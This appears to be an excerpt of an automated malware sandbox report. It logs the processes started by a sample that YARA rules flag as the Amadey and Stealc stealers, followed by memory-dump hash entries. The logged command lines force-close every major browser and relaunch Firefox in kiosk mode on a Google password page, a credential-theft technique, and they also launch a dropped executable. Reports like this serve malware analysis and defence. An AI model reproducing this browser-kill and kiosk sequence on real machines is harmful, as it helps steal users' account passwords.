                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                                                                                            Start time:06:10:59
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                                                                                                                            Start time:06:11:02
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                                                                                            Start time:06:11:02
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                                                                            Imagebase:0x8b0000
                                                                                                                                                                                                                                                                                                            File size:74'240 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                                                                                            Start time:06:11:04
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                                                                                            Start time:06:11:05
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                                                                                            Start time:06:11:07
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2212 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e81363d9-7002-41a3-97be-ba7e9e1c74cc} 5040 "\\.\pipe\gecko-crash-server-pipe.5040" 1e565770310 socket
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                                                                                            Start time:06:11:07
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x7c0000
                                                                                                                                                                                                                                                                                                            File size:2'811'392 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:2F1C8416CEF3B59A907932142D732C06
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                                                                                            Start time:06:11:16
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xf40000
                                                                                                                                                                                                                                                                                                            File size:1'925'632 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:77483DF5AA89C592975F97C5B06E3B90
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                                                                                            Start time:06:11:23
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsCFCGIIEHIE.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                                                                                            Start time:06:11:23
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                                                                                            Start time:06:11:23
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\DocumentsCFCGIIEHIE.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\DocumentsCFCGIIEHIE.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xee0000
                                                                                                                                                                                                                                                                                                            File size:1'889'792 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:FC60FAC3B512854DF25F9A62A8982B5F
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000036.00000003.3180525146.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000036.00000002.3243376393.0000000000EE1000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                                            • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                                                                                            Start time:06:11:24
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exe"
                                                                                                                                                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                                                                                                                                                            File size:1'800'704 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:EFBCCEEFF7FBBE424508E4DE00AD3CCD
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000037.00000003.3183348550.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                                                                                            Start time:06:11:24
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                                                                                            Start time:06:11:25
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1984,i,15563652493800643433,5868694598429771387,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                                                                                            Start time:06:11:32
                                                                                                                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=7b9f3f6834.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                                            Reset < >
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 09ea1bff37aefc95d0921480168802da47f774feef6ff4a0d2432a23c6303d78
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6dc8a1333da0275f045010f776ab00d4034abea237b54dfd4fc9dae42376223d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09ea1bff37aefc95d0921480168802da47f774feef6ff4a0d2432a23c6303d78
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 851104EB14C121BE7141D5427B29AFF67AEE1D6B30771C82BFC06C5506E2994E8E5132
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: bd9555de5c557ec9ac1e357f9e09c05d710c3bf62178356b7842ca162f6b6573
                                                                                                                                                                                                                                                                                                              • Instruction ID: b2241aef235d8539ef5f12571f834915dd440f407f58429fa852a3455206850d
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd9555de5c557ec9ac1e357f9e09c05d710c3bf62178356b7842ca162f6b6573
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D21ACEB14C120FEB141C5427B28BFF67AEE6C2B30331892BFC02C5101E2994E8E5136
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2799b2ac8d740eab786d54c865a2a22d93b773b920b1d301e2912c1a141bfe75
                                                                                                                                                                                                                                                                                                              • Instruction ID: d6e4d5453fbdae51f328e63995a575a26ebd646743ac1119472d7f1b757a0876
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2799b2ac8d740eab786d54c865a2a22d93b773b920b1d301e2912c1a141bfe75
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54114CEB15C121BD7141C5427B29AFF67AEE5D6B30331C82BFC46C5406E29A4B8E5136
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 761879f218622a38c2af8cac8c2e856d06f9dd771feb5362440bd770a7135c45
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2c7ecbc618e26bc95bfc0335e0bb85067c0cf58d5483533803b9fdc3fb4bcae9
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 761879f218622a38c2af8cac8c2e856d06f9dd771feb5362440bd770a7135c45
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44016DFB14C121FEB141D5437B29AFF67AEE6C2730770842AFC42C5402E2564A9D5131
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: f3591c0428ddeb9777448d7cde24fb7d36c7d970bb13710b0b180ec7fd0c116e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0a3ad5350376cdbeaeab183f255d8d208b8968f9d85989a2c4ee92ee2d33d985
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3591c0428ddeb9777448d7cde24fb7d36c7d970bb13710b0b180ec7fd0c116e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B0169BB14C264BEB542C5467B29AFF6B6EE6C2730730C86AFC42C5002E2954E8E5231
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 522d32dfdc99c32c3620d8823053ffe1781fbf353ffb90b31914bece37b4450e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9e2eb5a142412e10eb90ea27ded862dccc5ab64dabc7f47996ed0a76178a7822
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 522d32dfdc99c32c3620d8823053ffe1781fbf353ffb90b31914bece37b4450e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C0104BB10D150AEB241C152BA28EFFBB69E6C1B30330881FF842C5005E2150E9D9071
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1778093687.0000000005050000.00000040.00001000.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5050000_file.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 99967e6b6fac54f124bdc8d8c320385788d5869498d396671c1ce292c091cd00
                                                                                                                                                                                                                                                                                                              • Instruction ID: cee14fc36e5e440d9ee6dbae911522c3a601bd707174a5b4e3b63e69d5b2e394
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99967e6b6fac54f124bdc8d8c320385788d5869498d396671c1ce292c091cd00
